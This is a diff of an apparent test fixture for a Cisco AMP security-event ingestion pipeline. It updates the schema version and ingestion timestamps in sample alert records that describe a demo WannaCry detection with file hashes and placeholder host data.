                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -986,7 +986,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1006,7 +1006,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843522517Z",
+                "ingested": "2021-09-13T18:07:04.510348605Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1061,7 +1061,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1081,7 +1081,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843524393Z",
+                "ingested": "2021-09-13T18:07:04.510350482Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1136,7 +1136,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1156,7 +1156,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843526269Z",
+                "ingested": "2021-09-13T18:07:04.510352372Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1211,7 +1211,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1231,7 +1231,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843528155Z",
+                "ingested": "2021-09-13T18:07:04.510354257Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1286,7 +1286,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1306,7 +1306,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843558928Z",
+                "ingested": "2021-09-13T18:07:04.510356238Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1361,7 +1361,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1381,7 +1381,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843562131Z",
+                "ingested": "2021-09-13T18:07:04.510358126Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1436,7 +1436,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1456,7 +1456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843564045Z",
+                "ingested": "2021-09-13T18:07:04.510360004Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1511,7 +1511,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1531,7 +1531,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843565954Z",
+                "ingested": "2021-09-13T18:07:04.510361876Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1586,7 +1586,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1606,7 +1606,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843567900Z",
+                "ingested": "2021-09-13T18:07:04.510363767Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1661,7 +1661,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1681,7 +1681,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843569770Z",
+                "ingested": "2021-09-13T18:07:04.510365640Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1736,7 +1736,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1756,7 +1756,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843571678Z",
+                "ingested": "2021-09-13T18:07:04.510367543Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1811,7 +1811,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1831,7 +1831,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843573820Z",
+                "ingested": "2021-09-13T18:07:04.510369477Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1886,7 +1886,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1906,7 +1906,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843575704Z",
+                "ingested": "2021-09-13T18:07:04.510371353Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1961,7 +1961,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1981,7 +1981,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843595495Z",
+                "ingested": "2021-09-13T18:07:04.510373257Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2045,7 +2045,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2075,7 +2075,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843599818Z",
+                "ingested": "2021-09-13T18:07:04.510375122Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2141,7 +2141,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2171,7 +2171,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843601745Z",
+                "ingested": "2021-09-13T18:07:04.510376987Z",
